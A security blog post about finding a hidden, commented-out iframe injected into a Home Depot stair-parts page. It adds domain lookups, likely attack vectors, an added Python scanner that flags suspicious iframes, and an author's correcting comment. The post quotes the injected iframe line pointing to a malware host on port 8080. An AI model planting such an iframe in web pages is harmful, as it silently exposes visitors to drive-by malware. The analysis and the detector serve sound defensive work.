Home Depot Website Hack

It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website.  It all started with a simple Google search for “home depot stair spindles”.

The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.

As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.

As can be seen in the screenshot, the below code has been injected into the page:

<iframe src="hxxp://vwui.in:8080/index.php" width=170 height=185 style="visibility: hidden"></iframe>

The site vwui.in is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://vwui.in/

http://stopbadware.org/reports/90331f78dc600d02b5c6f6e77f807915

After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting.  As it turns out, this domain no longer resolves.

[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)

StopBadWare lists the IP associated with this domain as 209.85.51.176 which according to the whois database belongs to ThePlanet.com Internet Services.

[prompt ~]$ whois 209.85.51.176
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 - 209.85.51.255
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 - 209.85.127.255

Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.

So how did this page on Home Depot's website get compromised? While it's not possible for me to know for certain without a complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:

  • Compromised FTP credentials due to a weak password
  • Brute force compromise of server credentials
  • SQL injection

Back in 2009, tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe, and they tended to host their malware on port 8080 rather than the standard port 80. Given that the server vwui.in was first listed as a malicious site in 2009, that it serves from port 8080, and that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive 2009 attack and has only now been discovered. While the iframe on the Home Depot website is not currently a threat (its target domain no longer resolves), the vulnerability that allowed it to be inserted may still be present and could lead to a future compromise of the site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.
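As an added illustration (not code from the original post), the following Python scanner applies the indicators discussed above to a page's HTML: it flags iframes that are hidden by CSS or sized 1x1, point at a host outside the site, use a non-standard port, or sit inside an HTML comment, since a disabled injection is still evidence of a past compromise. The sample page, the relative player path, the 1x1 copy and the site host "homedepot.com" are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_CSS = ("visibility:hidden", "display:none")

class IframeFinder(HTMLParser):
    def __init__(self, in_comment=False):
        super().__init__()
        self.in_comment = in_comment
        self.iframes = []  # (attrs dict, found-inside-comment flag)

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((dict(attrs), self.in_comment))

    def handle_comment(self, data):
        # A commented-out injection is still evidence of a past compromise, so parse it too.
        sub = IframeFinder(in_comment=True)
        sub.feed(data)
        self.iframes.extend(sub.iframes)

def classify_iframe(attrs, in_comment, site_host):
    # Returns the reasons an iframe looks injected; an empty list means it looks benign.
    reasons = []
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if any(css in style for css in HIDDEN_CSS):
        reasons.append("hidden via CSS")
    w, h = attrs.get("width") or "", attrs.get("height") or ""
    if w.isdigit() and h.isdigit() and int(w) * int(h) <= 1:
        reasons.append("tiny size")
    src = urlparse(attrs.get("src") or "")
    host = (src.hostname or "").lower()
    if host and host != site_host and not host.endswith("." + site_host):
        reasons.append("external host " + host)
    if src.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % src.port)
    if in_comment:
        reasons.append("inside HTML comment")
    return reasons

def find_suspicious_iframes(html, site_host):
    finder = IframeFinder()
    finder.feed(html)
    found = [(a.get("src") or "", classify_iframe(a, c, site_host)) for a, c in finder.iframes]
    return [f for f in found if f[1]]

# Constructed sample: a benign same-site iframe, the hidden iframe quoted above, and a commented-out copy.
SAMPLE_HTML = """<iframe src="/stairparts/player.html" width=400 height=300></iframe>
<iframe src="hxxp://vwui.in:8080/index.php" width=170 height=185 style="visibility: hidden"></iframe>
<!-- <iframe src="hxxp://vwui.in:8080/index.php" width=1 height=1 style="display:none"></iframe> -->"""
```

Running `find_suspicious_iframes(SAMPLE_HTML, "homedepot.com")` reports the two vwui.in iframes and stays silent on the same-site one.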

2 Responses to “Home Depot Website Hack”

  1. Mark Baldwin says:

    I would like to thank Scott Frost and Steve Bush for pointing out that the malicious iframe I discovered on the Home Depot web site had been commented out. This was an oversight on my part and was not left out of the article intentionally. Nevertheless, the point of my story is the same. At some time in the past this page was injected with an iframe that linked to a malicious web site. It is reasonable to assume that this code was active and likely did result in the infection of some Home Depot site visitors’ PCs. This iframe must have been detected by Home Depot at some point and the developer decided to comment out the iframe rather than delete it. The malicious site in question was also taken down at some point. It is worth noting that my AV software still detected the commented iframe (nice job Avast) which is what led me to the discovery.
